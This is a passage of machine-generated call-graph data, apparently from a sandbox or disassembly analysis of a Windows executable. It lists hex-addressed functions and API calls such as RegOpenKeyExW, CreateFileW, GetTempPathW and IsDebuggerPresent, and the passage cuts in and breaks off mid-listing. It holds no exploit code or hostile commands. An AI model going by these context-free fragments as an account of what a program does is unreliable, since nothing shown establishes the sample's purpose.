105196 f1f278 105195->105196 105197 f1f1c7 105195->105197 105196->105194 105202 ec78c4 61 API calls 105196->105202 105197->105194 105201 ec78c4 61 API calls 105197->105201 105200->105158 105201->105197 105202->105196 105203->105173 105204->105182 105206 ec9169 Mailbox 105205->105206 105207 eff19f 105206->105207 105212 ec9173 105206->105212 105208 ee0db6 Mailbox 59 API calls 105207->105208 105210 eff1ab 105208->105210 105209 ec917a 105209->105185 105211 ec9c90 Mailbox 59 API calls 105211->105212 105212->105209 105212->105211 105214 f24475 FindFirstFileW 105213->105214 105215 f23c3e 105213->105215 105214->105215 105216 f2448a FindClose 105214->105216 105215->103981 105216->105215 105217->104171 105218->104143 105219->104158 105220->104154 105221->104159 105222->104169 105223->104172 105224->104176 105225->104001 105226->103998 105227->103885 105228->103899 105229 ec1066 105234 ecf76f 105229->105234 105231 ec106c 105232 ee2d40 __cinit 67 API calls 105231->105232 105233 ec1076 105232->105233 105235 ecf790 105234->105235 105267 edff03 105235->105267 105239 ecf7d7 105240 ec7667 59 API calls 105239->105240 105241 ecf7e1 105240->105241 105242 ec7667 59 API calls 105241->105242 105243 ecf7eb 105242->105243 105244 ec7667 59 API calls 105243->105244 105245 ecf7f5 105244->105245 105246 ec7667 59 API calls 105245->105246 105247 ecf833 105246->105247 105248 ec7667 59 API calls 105247->105248 105249 ecf8fe 105248->105249 105277 ed5f87 105249->105277 105253 ecf930 105254 ec7667 59 API calls 105253->105254 105255 ecf93a 105254->105255 105305 edfd9e 105255->105305 105257 ecf981 105258 ecf991 GetStdHandle 105257->105258 105259 ecf9dd 105258->105259 105260 f045ab 105258->105260 105261 ecf9e5 OleInitialize 105259->105261 105260->105259 105262 f045b4 105260->105262 105261->105231 105312 f26b38 64 API calls Mailbox 105262->105312 105264 f045bb 105313 f27207 CreateThread 105264->105313 105266 f045c7 CloseHandle 105266->105261 105314 edffdc 105267->105314 105270 edffdc 59 API calls 105271 edff45 105270->105271 105272 ec7667 59 API calls 105271->105272 105273 edff51 105272->105273 105274 ec7bcc 59 API calls 105273->105274 105275 ecf796 105274->105275 105276 ee0162 6 API calls 105275->105276 105276->105239 105278 ec7667 59 API calls 105277->105278 105279 ed5f97 105278->105279 105280 ec7667 59 API calls 105279->105280 105281 ed5f9f 105280->105281 105321 ed5a9d 105281->105321 105284 ed5a9d 59 API calls 105285 ed5faf 105284->105285 105286 ec7667 59 API calls 105285->105286 105287 ed5fba 105286->105287 105288 ee0db6 Mailbox 59 API calls 105287->105288 105289 ecf908 105288->105289 105290 ed60f9 105289->105290 105291 ed6107 105290->105291 105292 ec7667 59 API calls 105291->105292 105293 ed6112 105292->105293 105294 ec7667 59 API calls 105293->105294 105295 ed611d 105294->105295 105296 ec7667 59 API calls 105295->105296 105297 ed6128 105296->105297 105298 ec7667 59 API calls 105297->105298 105299 ed6133 105298->105299 105300 ed5a9d 59 API calls 105299->105300 105301 ed613e 105300->105301 105302 ee0db6 Mailbox 59 API calls 105301->105302 105303 ed6145 RegisterWindowMessageW 105302->105303 105303->105253 105306 edfdae 105305->105306 105307 f1576f 105305->105307 105309 ee0db6 Mailbox 59 API calls 105306->105309 105324 f29ae7 60 API calls 105307->105324 105311 edfdb6 105309->105311 105310 f1577a 105311->105257 105312->105264 105313->105266 105325 f271ed 65 API calls 105313->105325 105315 ec7667 59 API calls 105314->105315 105316 edffe7 105315->105316 105317 ec7667 59 API calls 105316->105317 105318 edffef 105317->105318 105319 ec7667 59 API calls 105318->105319 105320 edff3b 105319->105320 105320->105270 105322 ec7667 59 API calls 105321->105322 105323 ed5aa5 105322->105323 105323->105284 105324->105310 105326 ec107d 105331 ec708b 105326->105331 105328 ec108c 105329 ee2d40 __cinit 67 API calls 105328->105329 105330 ec1096 105329->105330 105332 ec709b __write_nolock 105331->105332 105333 ec7667 59 API calls 105332->105333 105334 ec7151 105333->105334 105362 ec4706 105334->105362 105336 ec715a 105369 ee050b 105336->105369 105339 ec7cab 59 API calls 105340 ec7173 105339->105340 105375 ec3f74 105340->105375 105343 ec7667 59 API calls 105344 ec718b 105343->105344 105345 ec7d8c 59 API calls 105344->105345 105346 ec7194 RegOpenKeyExW 105345->105346 105347 efe8b1 RegQueryValueExW 105346->105347 105352 ec71b6 Mailbox 105346->105352 105348 efe8ce 105347->105348 105349 efe943 RegCloseKey 105347->105349 105350 ee0db6 Mailbox 59 API calls 105348->105350 105349->105352 105361 efe955 _wcscat Mailbox __wsetenvp 105349->105361 105351 efe8e7 105350->105351 105353 ec522e 59 API calls 105351->105353 105352->105328 105354 efe8f2 RegQueryValueExW 105353->105354 105356 efe90f 105354->105356 105358 efe929 105354->105358 105355 ec79f2 59 API calls 105355->105361 105357 ec7bcc 59 API calls 105356->105357 105357->105358 105358->105349 105359 ec7de1 59 API calls 105359->105361 105360 ec3f74 59 API calls 105360->105361 105361->105352 105361->105355 105361->105359 105361->105360 105381 ef1940 105362->105381 105365 ec7de1 59 API calls 105366 ec4739 105365->105366 105383 ec4750 105366->105383 105368 ec4743 Mailbox 105368->105336 105370 ef1940 __write_nolock 105369->105370 105371 ee0518 GetFullPathNameW 105370->105371 105372 ee053a 105371->105372 105373 ec7bcc 59 API calls 105372->105373 105374 ec7165 105373->105374 105374->105339 105377 ec3f82 105375->105377 105380 ec3fa4 _memmove 105375->105380 105376 ee0db6 Mailbox 59 API calls 105378 ec3fb8 105376->105378 105379 ee0db6 Mailbox 59 API calls 105377->105379 105378->105343 105379->105380 105380->105376 105382 ec4713 GetModuleFileNameW 105381->105382 105382->105365 105384 ef1940 __write_nolock 105383->105384 105385 ec475d GetFullPathNameW 105384->105385 105386 ec477c 105385->105386 105387 ec4799 105385->105387 105389 ec7bcc 59 API calls 105386->105389 105388 ec7d8c 59 API calls 105387->105388 105390 ec4788 105388->105390 105389->105390 105393 ec7726 105390->105393 105394 ec7734 105393->105394 105395 ec7d2c 59 API calls 105394->105395 105396 ec4794 105395->105396 105396->105368 105397 effdfc 105430 ecab30 Mailbox _memmove 105397->105430 105399 f1617e Mailbox 59 API calls 105425 eca057 105399->105425 105400 ec9c90 Mailbox 59 API calls 105400->105430 105401 ee0db6 59 API calls Mailbox 105401->105430 105404 ecb525 105623 f29e4a 89 API calls 4 library calls 105404->105623 105405 ee0db6 59 API calls Mailbox 105422 ec9f37 Mailbox 105405->105422 105406 f00055 105622 f29e4a 89 API calls 4 library calls 105406->105622 105408 ecb475 105415 ec8047 59 API calls 105408->105415 105411 f00064 105412 ecb47a 105412->105406 105426 f009e5 105412->105426 105415->105425 105416 ec7667 59 API calls 105416->105422 105418 ec8047 59 API calls 105418->105422 105419 ee2d40 67 API calls __cinit 105419->105422 105420 ec7de1 59 API calls 105420->105430 105421 f16e8f 59 API calls 105421->105422 105422->105405 105422->105406 105422->105408 105422->105412 105422->105416 105422->105418 105422->105419 105422->105421 105423 f009d6 105422->105423 105422->105425 105427 eca55a 105422->105427 105618 ecc8c0 340 API calls 2 library calls 105422->105618 105619 ecb900 60 API calls Mailbox 105422->105619 105626 f29e4a 89 API calls 4 library calls 105423->105626 105627 f29e4a 89 API calls 4 library calls 105426->105627 105625 f29e4a 89 API calls 4 library calls 105427->105625 105428 f3bc6b 340 API calls 105428->105430 105430->105400 105430->105401 105430->105404 105430->105420 105430->105422 105430->105425 105430->105428 105431 ec9ea0 340 API calls 105430->105431 105433 f0086a 105430->105433 105435 f00878 105430->105435 105437 f0085c 105430->105437 105438 ecb21c 105430->105438 105441 f16e8f 59 API calls 105430->105441 105443 ecb2b6 105430->105443 105449 f2d07b 105430->105449 105496 f3df23 105430->105496 105499 ed1fc3 105430->105499 105539 f3445a 105430->105539 105548 f422da 105430->105548 105577 f3c2e0 105430->105577 105609 f27956 105430->105609 105615 f1617e 105430->105615 105621 f3c193 85 API calls 2 library calls 105430->105621 105431->105430 105434 ec9c90 Mailbox 59 API calls 105433->105434 105434->105437 105624 f29e4a 89 API calls 4 library calls 105435->105624 105437->105399 105437->105425 105439 ec9d3c 60 API calls 105438->105439 105440 ecb22d 105439->105440 105442 ec9d3c 60 API calls 105440->105442 105441->105430 105442->105443 105620 ecf6a3 340 API calls 105443->105620 105450 f2d09a 105449->105450 105451 f2d0a5 105449->105451 105641 ec9b3c 59 API calls 105450->105641 105455 ec7667 59 API calls 105451->105455 105493 f2d17f Mailbox 105451->105493 105453 ee0db6 Mailbox 59 API calls 105454 f2d1c8 105453->105454 105456 f2d1d4 105454->105456 105644 ec57a6 60 API calls Mailbox 105454->105644 105457 f2d0c9 105455->105457 105460 ec9837 84 API calls 105456->105460 105459 ec7667 59 API calls 105457->105459 105461 f2d0d2 105459->105461 105462 f2d1ec 105460->105462 105463 ec9837 84 API calls 105461->105463 105628 ec57f6 105462->105628 105465 f2d0de 105463->105465 105467 ec459b 59 API calls 105465->105467 105470 f2d0f3 105467->105470 105468 f2d233 105474 f2d295 105468->105474 105475 f2d25e 105468->105475 105469 f2d1ff GetLastError 105471 f2d218 105469->105471 105472 ec7b2e 59 API calls 105470->105472 105491 f2d188 Mailbox 105471->105491 105645 ec58ba CloseHandle 105471->105645 105473 f2d126 105472->105473 105476 f2d178 105473->105476 105481 f23c37 3 API calls 105473->105481 105477 ee0db6 Mailbox 59 API calls 105474->105477 105478 ee0db6 Mailbox 59 API calls 105475->105478 105643 ec9b3c 59 API calls 105476->105643 105482 f2d29a 105477->105482 105483 f2d263 105478->105483 105484 f2d136 105481->105484 105487 ec7667 59 API calls 105482->105487 105482->105491 105485 f2d274 105483->105485 105488 ec7667 59 API calls 105483->105488 105484->105476 105486 f2d13a 105484->105486 105646 f3fbce 59 API calls 2 library calls 105485->105646 105490 ec7de1 59 API calls 105486->105490 105487->105491 105488->105485 105492 f2d147 105490->105492 105491->105430 105642 f23a2a 63 API calls Mailbox 105492->105642 105493->105453 105493->105491 105495 f2d150 Mailbox 105495->105476 105497 f3cadd 129 API calls 105496->105497 105498 f3df33 105497->105498 105498->105430 105693 ec9a98 105499->105693 105503 ee0db6 Mailbox 59 API calls 105504 ed1ff4 105503->105504 105505 ed2004 105504->105505 105721 ec57a6 60 API calls Mailbox 105504->105721 105509 ec9837 84 API calls 105505->105509 105506 f06585 105507 ed2029 105506->105507 105725 f2f574 59 API calls 105506->105725 105515 ed2036 105507->105515 105726 ec9b3c 59 API calls 105507->105726 105511 ed2012 105509->105511 105513 ec57f6 67 API calls 105511->105513 105512 f065cd 105514 f065d5 105512->105514 105512->105515 105516 ed2021 105513->105516 105727 ec9b3c 59 API calls 105514->105727 105518 ec5cdf 2 API calls 105515->105518 105516->105506 105516->105507 105724 ec58ba CloseHandle 105516->105724 105520 ed203d 105518->105520 105521 f065e7 105520->105521 105522 ed2057 105520->105522 105524 ee0db6 Mailbox 59 API calls 105521->105524 105523 ec7667 59 API calls 105522->105523 105525 ed205f 105523->105525 105526 f065ed 105524->105526 105706 ec5572 105525->105706 105531 f06601 105526->105531 105728 ec5850 ReadFile SetFilePointerEx 105526->105728 105530 ed206e 105533 f06605 _memmove 105530->105533 105722 ec9a3c 59 API calls Mailbox 105530->105722 105531->105533 105729 f276c4 59 API calls 2 library calls 105531->105729 105534 ed2082 Mailbox 105535 ed20bc 105534->105535 105536 ec5c6f CloseHandle 105534->105536 105535->105430 105537 ed20b0 105536->105537 105537->105535 105723 ec58ba CloseHandle 105537->105723 105540 ec9837 84 API calls 105539->105540 105541 f34494 105540->105541 105733 ec6240 105541->105733 105543 f344a4 105544 f344c9 105543->105544 105545 ec9ea0 340 API calls 105543->105545 105546 ec9a98 59 API calls 105544->105546 105547 f344cd 105544->105547 105545->105544 105546->105547 105547->105430 105549 ec9837 84 API calls 105548->105549 105550 f422f4 105549->105550 105551 ec7a16 59 API calls 105550->105551 105552 f42303 105551->105552 105553 f42331 105552->105553 105784 ec9b3c 59 API calls 105552->105784 105554 ed5a9d 59 API calls 105553->105554 105557 f4233a 105554->105557 105556 f42314 105556->105553 105558 f42319 105556->105558 105559 ec7de1 59 API calls 105557->105559 105560 ec8047 59 API calls 105558->105560 105561 f42348 105559->105561 105562 f42323 Mailbox 105560->105562 105766 ed5b12 105561->105766 105789 ec9a3c 59 API calls Mailbox 105562->105789 105564 f42357 Mailbox 105775 ed5bc4 105564->105775 105568 f4240b Mailbox 105568->105430 105569 ec7667 59 API calls 105572 f42389 105569->105572 105570 f423c0 105574 ec7b2e 59 API calls 105570->105574 105575 f423da Mailbox 105570->105575 105572->105570 105573 ec3f74 59 API calls 105572->105573 105778 f161bb 105572->105778 105573->105572 105574->105570 105785 ed5ace 105575->105785 105578 ec7667 59 API calls 105577->105578 105579 f3c2f4 105578->105579 105580 ec7667 59 API calls 105579->105580 105581 f3c2fc 105580->105581 105582 ec7667 59 API calls 105581->105582 105583 f3c304 105582->105583 105584 ec9837 84 API calls 105583->105584 105608 f3c312 105584->105608 105585 ec7924 59 API calls 105585->105608 105586 ec7bcc 59 API calls 105586->105608 105587 f3c4fb 105590 f3c528 Mailbox 105587->105590 105806 ec9a3c 59 API calls Mailbox 105587->105806 105589 f3c4e2 105592 ec7cab 59 API calls 105589->105592 105590->105430 105591 ec8047 59 API calls 105591->105608 105594 f3c4ef 105592->105594 105593 f3c4fd 105595 ec7cab 59 API calls 105593->105595 105597 ec7b2e 59 API calls 105594->105597 105598 f3c50c 105595->105598 105596 ec7e4f 59 API calls 105600 f3c3a9 CharUpperBuffW 105596->105600 105597->105587 105601 ec7b2e 59 API calls 105598->105601 105599 ec7e4f 59 API calls 105602 f3c469 CharUpperBuffW 105599->105602 105805 ec843a 68 API calls 105600->105805 105601->105587 105604 ecc5a7 69 API calls 105602->105604 105604->105608 105605 ec9837 84 API calls 105605->105608 105606 ec7cab 59 API calls 105606->105608 105607 ec7b2e 59 API calls 105607->105608 105608->105585 105608->105586 105608->105587 105608->105589 105608->105590 105608->105591 105608->105593 105608->105596 105608->105599 105608->105605 105608->105606 105608->105607 105610 f27962 105609->105610 105611 ee0db6 Mailbox 59 API calls 105610->105611 105612 f27970 105611->105612 105613 f2797e 105612->105613 105614 ec7667 59 API calls 105612->105614 105613->105430 105614->105613 105807 f160c0 105615->105807 105617 f1618c 105617->105430 105618->105422 105619->105422 105620->105404 105621->105430 105622->105411 105623->105437 105624->105437 105625->105425 105626->105426 105627->105425 105647 ec5c6f 105628->105647 105632 ec5844 105632->105468 105632->105469 105633 ec5821 105633->105632 105659 ec5610 105633->105659 105635 ec5833 105676 ec527b SetFilePointerEx SetFilePointerEx 105635->105676 105637 ec583a 105637->105632 105639 efdc07 105637->105639 105677 f2345a SetFilePointerEx SetFilePointerEx WriteFile 105639->105677 105640 efdc37 105640->105632 105641->105451 105642->105495 105643->105493 105644->105456 105645->105491 105646->105491 105648 ec5c88 105647->105648 105649 ec5802 105647->105649 105648->105649 105650 ec5c8d CloseHandle 105648->105650 105651 ec5c99 105649->105651 105650->105649 105652 efdd58 105651->105652 105653 ec5cb2 CreateFileW 105651->105653 105654 efdd5e CreateFileW 105652->105654 105656 ec5cd4 105652->105656 105653->105656 105655 efdd84 105654->105655 105654->105656 105678 ec5aee 105655->105678 105656->105633 105660 ec562b 105659->105660 105661 efdba5 105659->105661 105662 ec5aee 2 API calls 105660->105662 105675 ec56ba 105660->105675 105661->105675 105688 ec5cdf 105661->105688 105663 ec564d 105662->105663 105664 ec522e 59 API calls 105663->105664 105666 ec5657 105664->105666 105666->105661 105667 ec5664 105666->105667 105668 ee0db6 Mailbox 59 API calls 105667->105668 105669 ec566f 105668->105669 105670 ec522e 59 API calls 105669->105670 105671 ec567a 105670->105671 105672 ec5bc0 2 API calls 105671->105672 105673 ec56a7 105672->105673 105674 ec5aee 2 API calls 105673->105674 105674->105675 105675->105635 105676->105637 105677->105640 105684 ec5b08 105678->105684 105679 ec5b8f SetFilePointerEx 105686 ec5c4e SetFilePointerEx 105679->105686 105680 efdd28 105687 ec5c4e SetFilePointerEx 105680->105687 105683 efdd42 105684->105679 105684->105680 105685 ec5b63 105684->105685 105685->105656 105686->105685 105687->105683 105689 ec5aee 2 API calls 105688->105689 105690 ec5d00 105689->105690 105691 ec5aee 2 API calls 105690->105691 105692 ec5d14 105691->105692 105692->105675 105694 ec9aa8 105693->105694 105695 eff7d6 105693->105695 105699 ee0db6 Mailbox 59 API calls 105694->105699 105696 eff7e7 105695->105696 105697 ec7bcc 59 API calls 105695->105697 105698 ec7d8c 59 API calls 105696->105698 105697->105696 105703 eff7f1 105698->105703 105700 ec9abb 105699->105700 105701 ec9ac6 105700->105701 105700->105703 105702 ec9ad4 105701->105702 105704 ec7de1 59 API calls 105701->105704 105702->105503 105702->105506 105703->105702 105705 ec7667 59 API calls 105703->105705 105704->105702 105705->105702 105707 ec557d 105706->105707 105708 ec55a2 105706->105708 105707->105708 105712 ec558c 105707->105712 105709 ec7d8c 59 API calls 105708->105709 105713 f2325e 105709->105713 105710 f2328d 105710->105530 105714 ec5ab8 59 API calls 105712->105714 105713->105710 105730 f231fa ReadFile SetFilePointerEx 105713->105730 105731 ec7924 59 API calls 2 library calls 105713->105731 105716 f2337e 105714->105716 105717 ec54d2 61 API calls 105716->105717 105718 f2338c 105717->105718 105720 f2339c Mailbox 105718->105720 105732 ec77da 61 API calls Mailbox 105718->105732 105720->105530 105721->105505 105722->105534 105723->105535 105724->105506 105725->105506 105726->105512 105727->105520 105728->105531 105729->105533 105730->105713 105731->105713 105732->105720 105734 ec7a16 59 API calls 105733->105734 105737 ec6265 105734->105737 105735 ec646a 105760 ec750f 59 API calls 2 library calls 105735->105760 105737->105735 105741 ec750f 59 API calls 105737->105741 105742 efdff6 105737->105742 105745 ec6799 _memmove 105737->105745 105747 ec7d8c 59 API calls 105737->105747 105751 efdf92 105737->105751 105755 ec7e4f 59 API calls 105737->105755 105758 ec5f6c 60 API calls 105737->105758 105759 ec5d41 59 API calls Mailbox 105737->105759 105761 ec5e72 60 API calls 105737->105761 105762 ec7924 59 API calls 2 library calls 105737->105762 105738 ec6484 Mailbox 105738->105543 105741->105737 105763 f1f8aa 91 API calls 4 library calls 105742->105763 105765 f1f8aa 91 API calls 4 library calls 105745->105765 105747->105737 105748 efe004 105764 ec750f 59 API calls 2 library calls 105748->105764 105750 efe01a 105750->105738 105752 ec8029 59 API calls 105751->105752 105754 efdf9d 105752->105754 105757 ee0db6 Mailbox 59 API calls 105754->105757 105756 ec643b CharUpperBuffW 105755->105756 105756->105737 105757->105745 105758->105737 105759->105737 105760->105738 105761->105737 105762->105737 105763->105748 105764->105750 105765->105738 105767 ed5ace 59 API calls 105766->105767 105768 ed5b20 105767->105768 105774 ed5b2f 105768->105774 105790 ed66e1 61 API calls 2 library calls 105768->105790 105770 ee0db6 Mailbox 59 API calls 105771 ed5b59 105770->105771 105771->105564 105772 ed5b7c 105772->105771 105791 ed5c32 59 API calls Mailbox 105772->105791 105774->105770 105776 ec8047 59 API calls 105775->105776 105777 ed5bd2 105776->105777 105777->105569 105779 f161c6 105778->105779 105781 f161d4 105778->105781 105780 ec7d2c 59 API calls 105779->105780 105783 f161d2 105780->105783 105792 ec774d 105781->105792 105783->105572 105784->105556 105786 ed5ad8 105785->105786 105787 ec7d8c 59 API calls 105786->105787 105788 ed5af3 105787->105788 105788->105562 105789->105568 105790->105772 105791->105774 105793 ec775c 105792->105793 105794 ec77cf 105792->105794 105793->105794 105796 ec7768 105793->105796 105795 ec7d2c 59 API calls 105794->105795 105801 ec777a _memmove 105795->105801 105797 ec77a0 105796->105797 105798 ec7772 105796->105798 105800 ec8029 59 API calls 105797->105800 105804 ec7f27 59 API calls Mailbox 105798->105804 105802 ec77aa 105800->105802 105801->105783 105803 ee0db6 Mailbox 59 API calls 105802->105803 105803->105801 105804->105801 105805->105608 105806->105590 105808 f160e8 105807->105808 105809 f160cb 105807->105809 105808->105617 105809->105808 105811 f160ab 59 API calls Mailbox 105809->105811 105811->105809 105812 f01de4 GetTempPathW 105813 f01e01 105812->105813 105814 ee7c56 105815 ee7c62 __setmbcp 105814->105815 105851 ee9e08 GetStartupInfoW 105815->105851 105817 ee7c67 105853 ee8b7c GetProcessHeap 105817->105853 105819 ee7cbf 105822 ee7cca 105819->105822 105936 ee7da6 58 API calls 3 library calls 105819->105936 105854 ee9ae6 105822->105854 105823 ee7cd0 105824 ee7cdb __RTC_Initialize 105823->105824 105937 ee7da6 58 API calls 3 library calls 105823->105937 105875 eed5d2 105824->105875 105827 ee7cea 105828 ee7cf6 GetCommandLineW 105827->105828 105938 ee7da6 58 API calls 3 library calls 105827->105938 105894 ef4f23 GetEnvironmentStringsW 105828->105894 105831 ee7cf5 105831->105828 105834 ee7d10 105835 ee7d1b 105834->105835 105939 ee30b5 58 API calls 3 library calls 105834->105939 105904 ef4d58 105835->105904 105838 ee7d21 105839 ee7d2c 105838->105839 105940 ee30b5 58 API calls 3 library calls 105838->105940 105918 ee30ef 105839->105918 105842 ee7d34 105843 ee7d3f __wwincmdln 105842->105843 105941 ee30b5 58 API calls 3 library calls 105842->105941 105924 ec47d0 105843->105924 105846 ee7d53 105847 ee7d62 105846->105847 105942 ee3358 58 API calls _doexit 105846->105942 105943 ee30e0 58 API calls _doexit 105847->105943 105850 ee7d67 __setmbcp 105852 ee9e1e 105851->105852 105852->105817 105853->105819 105944 ee3187 36 API calls 2 library calls 105854->105944 105856 ee9aeb 105945 ee9d3c InitializeCriticalSectionAndSpinCount ___lock_fhandle 105856->105945 105858 ee9af0 105859 ee9af4 105858->105859 105947 ee9d8a TlsAlloc 105858->105947 105946 ee9b5c 61 API calls 2 library calls 105859->105946 105862 ee9af9 105862->105823 105863 ee9b06 105863->105859 105864 ee9b11 105863->105864 105948 ee87d5 105864->105948 105867 ee9b53 105956 ee9b5c 61 API calls 2 library calls 105867->105956 105870 ee9b32 105870->105867 105872 ee9b38 105870->105872 105871 ee9b58 105871->105823 105955 ee9a33 58 API calls 4 library calls 105872->105955 105874 ee9b40 GetCurrentThreadId 105874->105823 105876 eed5de __setmbcp 105875->105876 105877 ee9c0b __lock 58 API calls 105876->105877 105878 eed5e5 105877->105878 105879 ee87d5 __calloc_crt 58 API calls 105878->105879 105880 eed5f6 105879->105880 105881 eed661 GetStartupInfoW 105880->105881 105882 eed601 @_EH4_CallFilterFunc@8 __setmbcp 105880->105882 105888 eed676 105881->105888 105891 eed7a5 105881->105891 105882->105827 105883 eed86d 105970 eed87d LeaveCriticalSection _doexit 105883->105970 105885 ee87d5 __calloc_crt 58 API calls 105885->105888 105886 eed7f2 GetStdHandle 105886->105891 105887 eed805 GetFileType 105887->105891 105888->105885 105890 eed6c4 105888->105890 105888->105891 105889 eed6f8 GetFileType 105889->105890 105890->105889 105890->105891 105968 ee9e2b InitializeCriticalSectionAndSpinCount 105890->105968 105891->105883 105891->105886 105891->105887 105969 ee9e2b InitializeCriticalSectionAndSpinCount 105891->105969 105895 ee7d06 105894->105895 105896 ef4f34 105894->105896 105900 ef4b1b GetModuleFileNameW 105895->105900 105896->105896 105971 ee881d 58 API calls 2 library calls 105896->105971 105898 ef4f5a _memmove 105899 ef4f70 FreeEnvironmentStringsW 105898->105899 105899->105895 105901 ef4b4f _wparse_cmdline 105900->105901 105903 ef4b8f _wparse_cmdline 105901->105903 105972 ee881d 58 API calls 2 library calls 105901->105972 105903->105834 105905 ef4d71 __wsetenvp 105904->105905 105909 ef4d69 105904->105909 105906 ee87d5 __calloc_crt 58 API calls 105905->105906 105914 ef4d9a __wsetenvp 105906->105914 105907 ef4df1 105908 ee2d55 _free 58 API calls 105907->105908 105908->105909 105909->105838 105910 ee87d5 __calloc_crt 58 API calls 105910->105914 105911 ef4e16 105912 ee2d55 _free 58 API calls 105911->105912 105912->105909 105914->105907 105914->105909 105914->105910 105914->105911 105915 ef4e2d 105914->105915 105973 ef4607 58 API calls 2 library calls 105914->105973 105974 ee8dc6 IsProcessorFeaturePresent 105915->105974 105917 ef4e39 105917->105838 105921 ee30fb __IsNonwritableInCurrentImage 105918->105921 105920 ee3119 __initterm_e 105922 ee2d40 __cinit 67 API calls 105920->105922 105923 ee3138 _doexit __IsNonwritableInCurrentImage 105920->105923 105989 eea4d1 105921->105989 105922->105923 105923->105842 105925 ec4889 105924->105925 105926 ec47ea 105924->105926 105925->105846 105927 ec4824 IsThemeActive 105926->105927 105992 ee336c 105927->105992 105931 ec4850 106004 ec48fd SystemParametersInfoW SystemParametersInfoW 105931->106004 105933 ec485c 106005 ec3b3a 105933->106005 105935 ec4864 SystemParametersInfoW 105935->105925 105936->105822 105937->105824 105938->105831 105942->105847 105943->105850 105944->105856 105945->105858 105946->105862 105947->105863 105951 ee87dc 105948->105951 105950 ee8817 105950->105867 105954 ee9de6 TlsSetValue 105950->105954 105951->105950 105952 ee87fa 105951->105952 105957 ef51f6 105951->105957 105952->105950 105952->105951 105965 eea132 Sleep 105952->105965 105954->105870 105955->105874 105956->105871 105958 ef5201 105957->105958 105963 ef521c 105957->105963 105959 ef520d 105958->105959 105958->105963 105966 ee8b28 58 API calls __getptd_noexit 105959->105966 105960 ef522c HeapAlloc 105960->105963 105964 ef5212 105960->105964 105963->105960 105963->105964 105967 ee33a1 DecodePointer 105963->105967 105964->105951 105965->105952 105966->105964 105967->105963 105968->105890 105969->105891 105970->105882 105971->105898 105972->105903 105973->105914 105975 ee8dd1 105974->105975 105980 ee8c59 105975->105980 105979 ee8dec 105979->105917 105981 ee8c73 _memset ___raise_securityfailure 105980->105981 105982 ee8c93 IsDebuggerPresent 105981->105982 105988 eea155 SetUnhandledExceptionFilter UnhandledExceptionFilter 105982->105988 105984 eec5f6 __atodbl_l 6 API calls 105986 ee8d7a 105984->105986 105985 ee8d57 ___raise_securityfailure 105985->105984 105987 eea140 GetCurrentProcess TerminateProcess 105986->105987 105987->105979 105988->105985 105990 eea4d4 EncodePointer 105989->105990 105990->105990 105991 eea4ee 105990->105991 105991->105920 105993 ee9c0b __lock 58 API calls 105992->105993 105994 ee3377 DecodePointer EncodePointer 105993->105994 106057 ee9d75 LeaveCriticalSection 105994->106057 105996 ec4849 105997 ee33d4 105996->105997 105998 ee33de 105997->105998 105999 ee33f8 105997->105999 105998->105999 106058 ee8b28 58 API calls __getptd_noexit 105998->106058 105999->105931 106001 ee33e8 106059 ee8db6 9 API calls __strnicoll_l 106001->106059 106003 ee33f3 106003->105931 106004->105933 106006 ec3b47 __write_nolock 106005->106006 106007 ec7667 59 API calls 106006->106007 106008 ec3b51 GetCurrentDirectoryW 106007->106008 106060 ec3766 106008->106060 106010 ec3b7a IsDebuggerPresent 106011 ec3b88 106010->106011 106012 efd272 MessageBoxA 106010->106012 106014 efd28c 106011->106014 106015 ec3ba5 106011->106015 106044 ec3c61 106011->106044 106012->106014 106013 ec3c68 SetCurrentDirectoryW 106016 ec3c75 Mailbox 106013->106016 106193 ec7213 59 API calls Mailbox 106014->106193 106141 ec7285 106015->106141 106016->105935 106019 efd29c 106024 efd2b2 SetCurrentDirectoryW 106019->106024 106024->106016 106044->106013 106057->105996 106058->106001 106059->106003 106061 ec7667 59 API calls 106060->106061 106062 ec377c 106061->106062 106195 ec3d31 106062->106195 106064 ec379a 106065 ec4706 61 API calls 106064->106065 106066 ec37ae 106065->106066 106067 ec7de1 59 API calls 106066->106067 106068 ec37bb 106067->106068 106069 ec4ddd 136 API calls 106068->106069 106070 ec37d4 106069->106070 106071 ec37dc Mailbox 106070->106071 106072 efd173 106070->106072 106076 ec8047 59 API calls 106071->106076 106237 f2955b 106072->106237 106075 efd192 106079 ee2d55 _free 58 API calls 106075->106079 106077 ec37ef 106076->106077 106209 ec928a 106077->106209 106078 ec4e4a 84 API calls 106078->106075 106080 efd19f 106079->106080 106082 ec4e4a 84 API calls 106080->106082 106084 efd1a8 106082->106084 106088 ec3ed0 59 API calls 106084->106088 106085 ec7de1 59 API calls 106086 ec3808 106085->106086 106087 ec84c0 69 API calls 106086->106087 106089 ec381a Mailbox 106087->106089 106090 efd1c3 106088->106090 106091 ec7de1 59 API calls 106089->106091 106092 ec3ed0 59 API calls 106090->106092 106093 ec3840 106091->106093 106094 efd1df 106092->106094 106095 ec84c0 69 API calls 106093->106095 106096 ec4706 61 API calls 106094->106096 106098 ec384f Mailbox 106095->106098 106097 efd204 106096->106097 106099 ec3ed0 59 API calls 106097->106099 106101 ec7667 59 API calls 106098->106101 106100 efd210 106099->106100 106102 ec8047 59 API calls 106100->106102 106103 ec386d 106101->106103 106104 efd21e 106102->106104 106212 ec3ed0 106103->106212 106106 ec3ed0 59 API calls 106104->106106 106108 efd22d 106106->106108 106114 ec8047 59 API calls 106108->106114 106110 ec3887 106110->106084 106111 ec3891 106110->106111 106112 ee2efd _W_store_winword 60 API calls 106111->106112 106113 ec389c 106112->106113 106113->106090 106115 ec38a6 106113->106115 106116 efd24f 106114->106116 106117 ee2efd _W_store_winword 60 API calls 106115->106117 106118 ec3ed0 59 API calls 106116->106118 106119 ec38b1 106117->106119 106120 efd25c 106118->106120 106119->106094 106121 ec38bb 106119->106121 106120->106120 106122 ee2efd _W_store_winword 60 API calls 106121->106122 106123 ec38c6 106122->106123 106123->106108 106124 ec3907 106123->106124 106126 ec3ed0 59 API calls 106123->106126 106124->106108 106125 ec3914 106124->106125 106128 ec92ce 59 API calls 106125->106128 106127 ec38ea 106126->106127 106129 ec8047 59 API calls 106127->106129 106130 ec3924 106128->106130 106131 ec38f8 106129->106131 106132 ec9050 59 API calls 106130->106132 106133 ec3ed0 59 API calls 106131->106133 106134 ec3932 106132->106134 106133->106124 106228 ec8ee0 106134->106228 106136 ec928a 59 API calls 106138 ec394f 106136->106138 106137 ec8ee0 60 API calls 106137->106138 106138->106136 106138->106137 106139 ec3ed0 59 API calls 106138->106139 106140 ec3995 Mailbox 106138->106140 106139->106138 106140->106010 106142 ec7292 __write_nolock 106141->106142 